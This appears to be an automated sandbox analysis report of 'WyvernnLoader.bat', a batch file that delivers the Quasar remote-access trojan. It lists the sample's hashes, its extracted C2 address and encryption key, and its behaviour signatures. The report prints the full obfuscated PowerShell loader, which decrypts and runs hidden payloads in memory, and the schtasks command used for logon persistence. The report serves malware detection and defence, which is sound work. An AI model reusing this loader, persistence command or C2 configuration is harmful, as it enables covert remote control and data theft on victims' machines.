Overview

overview

10

Static

static

1

WyvernnLoader.bat

windows7-x64

8

WyvernnLoader.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/06/2024, 06:14

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    WyvernnLoader.bat

  • Size

    1.6MB

  • MD5

    2e8b7b4aa7c67de8af9a98796ebef407

  • SHA1

    1b431b74102a1f321833d8eff397667c77c65e6e

  • SHA256

    f4b37a9883067f99e2d4c09c5c7c99e50c694212808d6041623644c574177e8b

  • SHA512

    d0d6756843ea10d369e98a3e4a75d00e0fd59416f415c57637576cf47ebc9c3f1f4b2debaf1db16f48f76f8c206ba257ec3f14f1d8fdd5382f0bfc228a231463

  • SSDEEP

    24576:NLS0EdLggkaNdVHdPZHaTrqYXWfX2wTcxG/VxDrG4BmJL549VbiIN8zCQj4rae1:NB+8xaHV9PWRfKTb2Bja

Score
10/10
quasaroffice04executionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

147.185.221.18:18043

Mutex

b70563dc-1a4b-4e44-8c78-87c8f325342d

Attributes
  • encryption_key

    211206313CE42AACEA301C4CAC6CB50A5128C03B

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    Management

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WyvernnLoader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XZII/d9kkEQttq/hiVyS2BmFzqEJ5nlwNGUkUnizcUk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UTDUKX/5ym5ZImZxC+ySDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nvFWX=New-Object System.IO.MemoryStream(,$param_var); $lduLx=New-Object System.IO.MemoryStream; $znyBk=New-Object System.IO.Compression.GZipStream($nvFWX, [IO.Compression.CompressionMode]::Decompress); $znyBk.CopyTo($lduLx); $znyBk.Dispose(); $nvFWX.Dispose(); $lduLx.Dispose(); $lduLx.ToArray();}function execute_function($param_var,$param2_var){ $FmAAH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qDXJE=$FmAAH.EntryPoint; $qDXJE.Invoke($null, $param2_var);}$SBbdD = 'C:\Users\Admin\AppData\Local\Temp\WyvernnLoader.bat';$host.UI.RawUI.WindowTitle = $SBbdD;$OXHIK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SBbdD).Split([Environment]::NewLine);foreach ($qWWAf in $OXHIK) { if ($qWWAf.StartsWith(':: ')) { $qxDSF=$qWWAf.Substring(3); break; }}$payloads_var=[string[]]$qxDSF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Management\Client.exe" /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:1132
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4008,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
    1⤵
      PID:3424

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xk2lp41x.eug.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/2988-14-0x0000019033D10000-0x0000019033E42000-memory.dmp

            Filesize

            1.2MB

            Download

          • memory/2988-1-0x0000019031930000-0x0000019031952000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2988-11-0x00007FFC061C0000-0x00007FFC06C81000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2988-12-0x00007FFC061C0000-0x00007FFC06C81000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2988-13-0x0000019019700000-0x0000019019708000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2988-0-0x00007FFC061C3000-0x00007FFC061C5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2988-15-0x0000019033E40000-0x0000019034164000-memory.dmp

            Filesize

            3.1MB

            Download

          • memory/2988-16-0x00007FFC061C0000-0x00007FFC06C81000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2988-17-0x0000019035800000-0x0000019035850000-memory.dmp

            Filesize

            320KB

            Download

          • memory/2988-18-0x0000019035910000-0x00000190359C2000-memory.dmp

            Filesize

            712KB

            Download

          • memory/2988-19-0x0000019035ED0000-0x0000019036092000-memory.dmp

            Filesize

            1.8MB

            Download

          • memory/2988-20-0x00007FFC061C0000-0x00007FFC06C81000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2988-21-0x00007FFC061C3000-0x00007FFC061C5000-memory.dmp

            Filesize

            8KB

            Download